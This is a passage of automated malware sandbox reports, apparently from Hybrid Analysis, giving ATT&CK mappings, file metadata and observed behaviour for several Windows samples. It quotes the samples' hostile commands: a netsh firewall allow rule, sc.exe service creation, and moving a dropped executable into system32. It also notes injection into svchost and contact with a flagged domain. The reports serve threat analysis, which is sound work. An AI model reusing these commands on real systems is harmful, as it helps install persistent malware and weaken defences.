00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000\") to a remote process \"C:\\Windows\\System32\\svchost.exe\"\n which might be an injection preparation attempt ...", "origin": "API Call", "attck_id": "T1055.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/002"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Anti-Detection/Stealthyness", "identifier": "target-269", "type": 9, "relevance": 7, "name": "Windows system process connects to a network", "description": "Process \"svchost.exe\" connects to <IPv4>:25", "origin": "Monitored Target", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Network Related", "identifier": "network-10", "type": 7, "relevance": 6, "name": "Sends network traffic on a typical mail related ports", "description": "Mail traffic to <IPv4> on port 25 (SMTP)\n Mail traffic to <IPv4> on port 25 (SMTP)", "origin": "Network Traffic", "attck_id": "T1071.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/003"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Network Related", "identifier": "network-88", "type": 7, "relevance": 10, "name": "Application communicates with a malicious domain", "description": "Contacted Domain: \"lazystax.ru\" has been identified as malicious", "origin": "Network Traffic", "attck_id": "T1566", "attck_id_wiki": "https://attack.mitre.org/techniques/T1566"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "System Security", "identifier": "target-303", "type": 9, "relevance": 10, "name": "Starts service using SC.exe", "description": "Process \"sc.exe\" with commandline \"start zvdnuoqu\" (UID: 00000000-00004836)", "origin": "Monitored Target", "attck_id": "T1569.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1569/002"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "System Security", "identifier": "target-15", "type": 9, "relevance": 8, "name": "Modifies firewall settings", "description": "Process \"netsh.exe\" with commandline \"advfirewall firewall add rule name=\"Host-process for services of Windows\" dir=in action=allow program=\"%WINDIR%\\\\system32\\\\svchost.exe\" enable=yes>nul\" (UID: 00000000-00002444)", "origin": "Monitored Target", "attck_id": "T1562.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562/004"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "External Systems", "identifier": "avtest-8", "type": 12, "relevance": 10, "name": "Sample detected by CrowdStrike Static Analysis and ML with relatively high confidence", "description": "CrowdStrike Static Analysis and ML (QuickScan) yielded detection: win/malicious_confidence_100% (W)", "origin": "External System"}]}
73a435399cf3116da6987933e5b067dd45d97d034f107085016c0a27869bc45d
https://hybrid-analysis.com/sample/73a435399cf3116da6987933e5b067dd45d97d034f107085016c0a27869bc45d
Hybrid Analysis - Um_unhooking
{"size": 102912, "type": "PE32 executable (console) Intel 80386, for MS Windows", "submit_name": "73a435399cf3116da6987933e5b067dd45d97d034f107085016c0a27869bc45d", "sha256": "73a435399cf3116da6987933e5b067dd45d97d034f107085016c0a27869bc45d", "av_detect": 2, "threat_score": 37, "threat_level": 1, "verdict": "suspicious", "certificates_validation_message": "No signature was present in the subject. (0x800b0100)", "total_processes": 1, "total_signatures": 51, "file_metadata": {"file_compositions": ["1 .OBJ Files (COFF) linked with LINK.EXE 5.10 (Visual Studio 5) (build: 30037)", "1 .OBJ Files (OMF) linked with LINK.EXE 6.00 (Visual Studio 6) (build: 30037)"], "imported_objects": ["17 .OBJ Files (OMF) linked with LINK.EXE 5.10 (Visual Studio 5) (build: 30034)", "17 .OBJ Files (COFF) linked with LINK.EXE 6.00 (Visual Studio 6) (build: 30034)", "37 .OBJ Files (OMF) linked with LINK.EXE 6.00 (Visual Studio 6) (build: 30034)", "18 .OBJ Files (COFF) linked with LINK.EXE 6.00 (Visual Studio 6) (build: 27412)", "141 .OBJ Files (OMF) linked with LINK.EXE 6.00 (Visual Studio 6) (build: 27412)", "10 .OBJ Files (OMF) linked with LINK.EXE 5.10 (Visual Studio 5) (build: 27412)"], "file_analysis": ["File appears to contain raw COFF/OMF content", "File is the product of a small codebase (0 files)"], "total_file_compositions_imports": 5}, "processes": [{"uid": "00000000-00004024", "name": "73a435399cf3116da6987933e5b067dd45d97d034f107085016c0a27869bc45d.exe", "normalized_path": "C:\\73a435399cf3116da6987933e5b067dd45d97d034f107085016c0a27869bc45d.exe", "sha256": "73a435399cf3116da6987933e5b067dd45d97d034f107085016c0a27869bc45d"}], "mitre_attcks": [{"tactic": "Execution", "technique": "Native API", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106", "suspicious_identifiers_count": 2, "informative_identifiers_count": 7}, {"tactic": "Execution", "technique": "Windows Command Shell", "attck_id": "T1059.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059/003", "informative_identifiers_count": 1, "parent": {"technique": "Command and Scripting Interpreter", "attck_id": "T1059", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059"}}, {"tactic": "Persistence", "technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543", "informative_identifiers_count": 1}, {"tactic": "Persistence", "technique": "AppInit DLLs", "attck_id": "T1546.010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/010", "informative_identifiers_count": 1, "parent": {"technique": "Event Triggered Execution", "attck_id": "T1546", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546"}}, {"tactic": "Privilege Escalation", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543", "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "AppInit DLLs", "attck_id": "T1546.010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/010", "informative_identifiers_count": 1, "parent": {"technique": "Event Triggered Execution", "attck_id": "T1546", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546"}}, {"tactic": "Defense Evasion", "technique": "Timestomp", "attck_id": "T1070.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/006", "informative_identifiers_count": 1, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "suspicious_identifiers_count": 1, "informative_identifiers_count": 3}, {"tactic": "Defense Evasion", "technique": "Software Packing", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002", "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Embedded Payloads", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009", "suspicious_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027", "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Indicator Removal from Tools", "attck_id": "T1027.005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/005", "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Execution Guardrails", "attck_id": "T1480", "attck_id_wiki": "https://attack.mitre.org/techniques/T1480", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Deobfuscate/Decode Files or Information", "attck_id": "T1140", "attck_id_wiki": "https://attack.mitre.org/techniques/T1140", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "File and Directory Discovery", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083", "informative_identifiers_count": 4}, {"tactic": "Discovery", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "suspicious_identifiers_count": 1, "informative_identifiers_count": 3}, {"tactic": "Discovery", "technique": "Query Registry", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012", "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "System Information Discovery", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "Process Discovery", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057", "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "System Time Discovery", "attck_id": "T1124", "attck_id_wiki": "https://attack.mitre.org/techniques/T1124", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "Security Software Discovery", "attck_id": "T1518.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518/001", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Software Discovery", "attck_id": "T1518", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518"}}, {"tactic": "Command and Control", "technique": "Ingress Tool Transfer", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105", "informative_identifiers_count": 1}, {"tactic": "Exfiltration", "technique": "Scheduled Transfer", "attck_id": "T1029", "attck_id_wiki": "https://attack.mitre.org/techniques/T1029", "informative_identifiers_count": 1}, {"tactic": "Impact", "technique": "Service Stop", "attck_id": "T1489", "attck_id_wiki": "https://attack.mitre.org/techniques/T1489", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}], "network_mode": "default", "signatures": [{"threat_level_human": "informative", "category": "General", "identifier": "static-153", "name": "Uses 32 bit executable PE", "description": "\"73a435399cf3116da6987933e5b067dd45d97d034f107085016c0a27869bc45d\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-96", "name": "PE file entrypoint instructions", "description": "\"73a435399cf3116da6987933e5b067dd45d97d034f107085016c0a27869bc45d\" file has an entrypoint instructions - \"call\t0x4017cb,jmp\t0x4013a1,push\tebp,mov\tebp, esp,mov\teax, dword ptr [ebp + 8],push\tesi,mov\tecx, dword ptr [eax + 0x3c],add\tecx, eax,movzx\teax, word ptr [ecx + 0x14],lea\tedx, [ecx + 0x18],add\tedx, eax,movzx\teax, word ptr [ecx + 6],imul\tesi, eax, 0x28,add\tesi, edx,cmp\tedx, esi,je\t0x401568,mov\tecx, dword ptr [ebp + 0xc],cmp\tecx, dword ptr [edx + 0xc],jb\t0x401561,mov\teax, dword ptr [edx + 8],add\teax, dword ptr [edx + 0xc],cmp\tecx, eax,jb\t0x40156d,add\tedx, 0x28,cmp\tedx, esi,jne\t0x401552,xor\teax, eax,pop\tesi,pop\tebp,ret\t,mov\teax, edx,jmp\t0x40156a,push\tesi,call\t0x401cd6,test\teax, eax,je\t0x40159b,mov\teax, dword ptr fs:[0x18],mov\tesi, 0x4198bc,\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-157", "name": "Matched Compiler/Packer signature (DIE)", "description": "\"73a435399cf3116da6987933e5b067dd45d97d034f107085016c0a27869bc45d\" was detected as \"EP:Microsoft Visual C/C++\" and name: \"Compiler\"\n \"73a435399cf3116da6987933e5b067dd45d97d034f107085016c0a27869bc45d\" was detected as \"Microsoft Visual C/C++\" and name: \"Compiler\"\n \"73a435399cf3116da6987933e5b067dd45d97d034f107085016c0a27869bc45d\" was detected as \"Microsoft Linker\" and name: \"Linker\"", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-154", "name": "File contains dynamic base/NX flags", "description": "\"73a435399cf3116da6987933e5b067dd45d97d034f107085016c0a27869bc45d\" has flags like IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE\n IMAGE_DLLCHARACTERISTICS_NX_COMPAT\n IMAGE_DLLCHARACTERISTICS_TERMINAL_SERVER_AWARE", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-80", "relevance": 1, "name": "PE file contains executable sections", "description": "\"73a435399cf3116da6987933e5b067dd45d97d034f107085016c0a27869bc45d\" has an executable section named \".text\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-95", "name": "PE file contains writable sections", "description": "\"73a435399cf3116da6987933e5b067dd45d97d034f107085016c0a27869bc45d\" has an writable section named \".data\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-146", "name": "PE file contains Debug data directory", "description": "\"73a435399cf3116da6987933e5b067dd45d97d034f107085016c0a27869bc45d\" has Debug data directory \"IMAGE_DIRECTORY_ENTRY_DEBUG\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "static-18", "relevance": 10, "name": "Matched Compiler/Packer signature", "description": "\"73a435399cf3116da6987933e5b067dd45d97d034f107085016c0a27869bc45d\" was detected as \"VC8 -> Microsoft Corporation\"", "origin": "Static Parser", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-126", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (executable)", "description": "\"73a435399cf3116da6987933e5b067dd45d97d034f107085016c0a27869bc45d.exe\" trying to access non-existent file \"C:\\dbghelp.dll\"\n \"73a435399cf3116da6987933e5b067dd45d97d034f107085016c0a27869bc45d.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"73a435399cf3116da6987933e5b067dd45d97d034f107085016c0a27869bc45d.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"73a435399cf3116da6987933e5b067dd45d97d034f107085016c0a27869bc45d.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-appmodel-runtime-l1-1-2.DLL\"\n \"73a435399cf3116da6987933e5b067dd45d97d034f107085016c0a27869bc45d.exe\" trying to access non-existent file \"C:\\DBGHELP.DLL\"\n \"73a435399cf3116da6987933e5b067dd45d97d034f107085016c0a27869bc45d.exe\" trying to access non-existent file \"C:\\Windows\\System32\\API-MS-WIN-CORE-FIBERS-L1-1-1.DLL\"\n \"73a435399cf3116da6987933e5b067dd45d97d034f107085016c0a27869bc45d.exe\" trying to access non-existent file \"C:\\Windows\\System32\\API-MS-WIN-CORE-LOCALIZATION-L1-2-1.DLL\"\n \"73a435399cf3116da6987933e5b067dd45d97d034f107085016c0a27869bc45d.exe\" trying to access non-existent file \"C:\\Windows\\System32\\API-MS-WIN-APPMODEL-RUNTIME-L1-1-2.DLL\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-177", "type": 3, "relevance": 1, "name": "Opens registry keys", "description": "\"73a435399cf3116da6987933e5b067dd45d97d034f107085016c0a27869bc45d.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"\"; Value: \"\")\n \"73a435399cf3116da6987933e5b067dd45d97d034f107085016c0a27869bc45d.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SAFEBOOT\\OPTION\"; Key: \"\"; Value: \"\")\n \"73a435399cf3116da6987933e5b067dd45d97d034f107085016c0a27869bc45d.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SRP\\GP\\DLL\"; Key: \"\"; Value: \"\")\n \"73a435399cf3116da6987933e5b067dd45d97d034f107085016c0a27869bc45d.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"\"; Value: \"\")\n \"73a435399cf3116da6987933e5b067dd45d97d034f107085016c0a27869bc45d.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"\"; Value: \"\")\n \"73a435399cf3116da6987933e5b067dd45d97d034f107085016c0a27869bc45d.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-172", "type": 3, "relevance": 1, "name": "Queries registry keys", "description": "\"73a435399cf3116da6987933e5b067dd45d97d034f107085016c0a27869bc45d.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"CWDILLEGALINDLLSEARCH\"; Value: \"\")\n \"73a435399cf3116da6987933e5b067dd45d97d034f107085016c0a27869bc45d.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"TRANSPARENTENABLED\"; Value: \"\")\n \"73a435399cf3116da6987933e5b067dd45d97d034f107085016c0a27869bc45d.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"COMPATDLL\"; Value: \"\")\n \"73a435399cf3116da6987933e5b067dd45d97d034f107085016c0a27869bc45d.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"00060101.00060101\"; Value: \"\")\n \"73a435399cf3116da6987933e5b067dd45d97d034f107085016c0a27869bc45d.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"\"; Value: \"\")\n \"73a435399cf3116da6987933e5b067dd45d97d034f107085016c0a27869bc45d.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"SAFEDLLSEARCHMODE\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-263", "type": 6, "relevance": 1, "name": "Touches files", "description": "\"73a435399cf3116da6987933e5b067dd45d97d034f107085016c0a27869bc45d.exe\" trying to touch file \"C:\\dbghelp.dll\"\n \"73a435399cf3116da6987933e5b067dd45d97d034f107085016c0a27869bc45d.exe\" trying to touch file \"C:\\Windows\\system32\\dbghelp.dll\"\n \"73a435399cf3116da6987933e5b067dd45d97d034f107085016c0a27869bc45d.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-synch-l1-2-0.DLL\"\n \"73a435399cf3116da6987933e5b067dd45d97d034f107085016c0a27869bc45d.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"73a435399cf3116da6987933e5b067dd45d97d034f107085016c0a27869bc45d.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"73a435399cf3116da6987933e5b067dd45d97d034f107085016c0a27869bc45d.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-appmodel-runtime-l1-1-2.DLL\"\n \"73a435399cf3116da6987933e5b067dd45d97d034f107085016c0a27869bc45d.exe\" trying to touch file \"C:\\DBGHELP.DLL\"\n \"73a435399cf3116da6987933e5b067dd45d97d034f107085016c0a27869bc45d.exe\" trying to touch file \"C:\\Windows\\System32\\dbghelp.dll\"\n \"73a435399cf3116da6987933e5b067dd45d97d034f107085016c0a27869bc45d.exe\" trying to touch file \"C:\\Windows\\System32\\api-ms-win-core-synch-l1-2-0.dll\"\n \"73a435399cf3116da6987933e5b067dd45d97d034f107085016c0a27869bc45d.exe\" trying to touch file \"C:\\Windows\\System32\\API-MS-WIN-CORE-FIBERS-L1-1-1.DLL\"\n \"73a435399cf3116da6987933e5b067dd45d97d034f107085016c0a27869bc45d.exe\" trying to touch file \"C:\\Windows\\System32\\API-MS-WIN-CORE-LOCALIZATION-L1-2-1.DLL\"\n \"73a435399cf3116da6987933e5b067dd45d97d034f107085016c0a27869bc45d.exe\" trying to touch file \"C:\\Windows\\System32\\API-MS-WIN-APPMODEL-RUNTIME-L1-1-2.DLL\"\n \"73a435399cf3116da6987933e5b067dd45d97d034f107085016c0a27869bc45d.exe\" trying to touch file \"%WINDIR%\\System32\\dbghelp.dll\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "module-16", "type": 10, "relevance": 3, "name": "Loads the debugger/analysis tool module", "description": "\"73a435399cf3116da6987933e5b067dd45d97d034f107085016c0a27869bc45d.exe\" loaded module \"%WINDIR%\\System32\\dbghelp.dll\" at 6FE40000", "origin": "Loaded Module", "attck_id": "T1518.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518/001"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Unusual Characteristics", "identifier": "string-64", "type": 2, "relevance": 10, "name": "Input file contains API references not part of its Import Address Table (IAT)", "description": "Found string \"FlsAlloc\" (Source: 73a435399cf3116da6987933e5b067dd45d97d034f107085016c0a27869bc45d, API is part of module: KERNELBASE.DLL)\n Found string \"FlsFree\" (Source: 73a435399cf3116da6987933e5b067dd45d97d034f107085016c0a27869bc45d, API is part of module: KERNELBASE.DLL)\n Found string \"FlsGetValue\" (Source: 73a435399cf3116da6987933e5b067dd45d97d034f107085016c0a27869bc45d, API is part of module: KERNELBASE.DLL)\n Found string \"FlsSetValue\" (Source: 73a435399cf3116da6987933e5b067dd45d97d034f107085016c0a27869bc45d, API is part of module: KERNELBASE.DLL)\n Found string \"InitializeCriticalSectionEx\" (Source: 73a435399cf3116da6987933e5b067dd45d97d034f107085016c0a27869bc45d, API is part of module: KERNELBASE.DLL)\n Found string \"AreFileApisANSI\" (Source: 73a435399cf3116da6987933e5b067dd45d97d034f107085016c0a27869bc45d, API is part of module: KERNELBASE.DLL)\n Found string \"CompareStringEx\" (Source: 73a435399cf3116da6987933e5b067dd45d97d034f107085016c0a27869bc45d, API is part of module: KERNELBASE.DLL)\n Found string \"LCMapStringEx\" (Source: 73a435399cf3116da6987933e5b067dd45d97d034f107085016c0a27869bc45d, API is part of module: KERNELBASE.DLL)\n Found string \"LocaleNameToLCID\" (Source: 73a435399cf3116da6987933e5b067dd45d97d034f107085016c0a27869bc45d, API is part of module: KERNELBASE.DLL)\n Found string \"log10\" (Source: 73a435399cf3116da6987933e5b067dd45d97d034f107085016c0a27869bc45d, API is part of module: MSVCRT.DLL)\n Found string \"atan2\" (Source: 73a435399cf3116da6987933e5b067dd45d97d034f107085016c0a27869bc45d, API is part of module: MSVCRT.DLL)\n Found string \"floor\" (Source: 73a435399cf3116da6987933e5b067dd45d97d034f107085016c0a27869bc45d, API is part of module: MSVCRT.DLL)\n Found string \"ldexp\" (Source: 73a435399cf3116da6987933e5b067dd45d97d034f107085016c0a27869bc45d, API is part of module: MSVCRT.DLL)\n Found string \"frexp\" (Source: 73a435399cf3116da6987933e5b067dd45d97d034f107085016c0a27869bc45d, API is part of module: MSVCRT.DLL)", "origin": "File/Memory", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Anti-Reverse Engineering", "identifier": "static-6", "relevance": 1, "name": "Section contains high entropy", "description": "\"73a435399cf3116da6987933e5b067dd45d97d034f107085016c0a27869bc45d\" has section name .text with entropy \"6.619459174160235\"\n \"73a435399cf3116da6987933e5b067dd45d97d034f107085016c0a27869bc45d\" has section name .reloc with entropy \"6.313632748580386\"", "origin": "Static Parser", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009"}]}
89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014
https://hybrid-analysis.com/sample/89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014
Hybrid Analysis - Um_unhooking
{"size": 11804160, "type": "PE32 executable (GUI) Intel 80386, for MS Windows", "submit_name": "89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014", "sha256": "89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014", "av_detect": 85, "vx_family": "Trojan.BrsecmonE", "threat_score": 100, "threat_level": 2, "verdict": "malicious", "certificates_validation_message": "No signature was present in the subject. (0x800b0100)", "total_network_connections": 7, "total_processes": 9, "total_signatures": 238, "extracted_files": [{"name": "dqczsfku.exe", "file_path": "%TEMP%\\dqczsfku.exe", "file_size": 5242368, "sha256": "fcc97376aa948456bf43a2ad8d3a0e46f4d0262d5b9d6ba08184d96670199c79", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "runtime_process": "89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe (PID: 4680)", "threat_level": 2, "threat_level_readable": "malicious", "file_available_to_download": true}, {"name": "dqczsfku.exe.67EE49BD.bin", "file_size": 12725760, "sha256": "94aaefa0b6eece4a7f724a4ac9550380e964344955555bc2f7a60e72d81d91f3", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "threat_level": 2, "threat_level_readable": "malicious", "file_available_to_download": true}], "file_metadata": {"file_compositions": ["1 .OBJ Files (COFF) linked with LINK.EXE 5.10 (Visual Studio 5) (build: 24215)", "1 Unknown Objects (build: 24215)", "1 .BAS Files compiled with C2.EXE 5.0 (Visual Basic 6) (build: 24215)"], "imported_objects": ["5 .LIB Files generated with LIB.EXE 9.00 (Visual Studio 2008) (build: 30729)", "17 .OBJ Files (COFF) linked with LINK.EXE 6.00 (Visual Studio 6) (build: 24123)", "30 .OBJ Files (OMF) linked with LINK.EXE 6.00 (Visual Studio 6) (build: 24123)", "18 .OBJ Files (OMF) linked with LINK.EXE 5.10 (Visual Studio 5) (build: 24123)"], "file_analysis": ["File contains Visual Basic code", "File appears to contain raw COFF/OMF content", "File is the product of a small codebase (1 files)"], "total_file_compositions_imports": 91}, "processes": [{"uid": "00000000-00004680", "name": "89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe", "normalized_path": "C:\\89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014.exe", "sha256": "89556f10251b58f31a9e3cbf5b298a1e325e4ada7344da89bea648d00f695014"}, {"uid": "00000000-00004940", "parentuid": "00000000-00004680", "name": "cmd.exe", "normalized_path": "%WINDIR%\\System32\\cmd.exe", "command_line": "/C mkdir %WINDIR%\\system32\\vrzjqkmq\\", "sha256": "17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae"}, {"uid": "00000000-00003672", "parentuid": "00000000-00004680", "name": "cmd.exe", "normalized_path": "%WINDIR%\\System32\\cmd.exe", "command_line": "/C move /Y \"%TEMP%\\dqczsfku.exe\" %WINDIR%\\system32\\vrzjqkmq\\", "sha256": "17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae"}, {"uid": "00000000-00003344", "parentuid": "00000000-00004680", "name": "sc.exe", "normalized_path": "%WINDIR%\\System32\\sc.exe", "command_line": "create vrzjqkmq binPath= 